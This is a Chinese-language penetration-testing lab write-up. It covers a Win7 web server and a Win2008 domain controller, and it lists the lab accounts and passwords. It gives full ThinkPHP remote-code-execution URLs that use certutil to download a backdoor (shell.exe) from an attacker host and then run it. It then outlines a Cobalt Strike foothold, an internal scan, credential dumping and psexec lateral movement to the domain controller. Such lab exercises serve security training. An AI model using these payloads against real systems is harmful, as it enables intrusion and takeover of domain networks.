环境搭建:
靶场地址:漏洞详情
靶机Win7:192.168.192.196(网络边界)、192.168.138.135(内网IP)
靶机Win2008:192.168.138.138(DC)
win7 WEB账号密码:
sun\heart 123.com
sun\Administrator dc123.com
DC账号密码
sun\admin 2020.com
win7,web主机需要进入到c盘下启动phpstudy
win7自定义的net网卡,需要把自定义网段修改成自动。
渗透过程
通过访问发现是经典的Thinkphp框架。
工具扫描发现存在rce漏洞
http://192.168.192.196/inDex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=certutil -urlcache -split -f http://192.168.1.101/fly/shell.exe //下载后门文件
http://192.168.192.196/inDex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=shell.exe//执行
cs上线并提权:
内网信息收集:
发现存在域环境:
portscan 192.168.138.0/24 445 arp 50//扫描内网主机
确认192.168.138.138为内网DC域控主机
扫描DC端口:
发现开启445端口开放:
横向移动:
抓取win7的账户账户密码:
尝试psexec
新建监听器:
尝试psexece移动:
成功上线:
至此靶机环境全部拿下: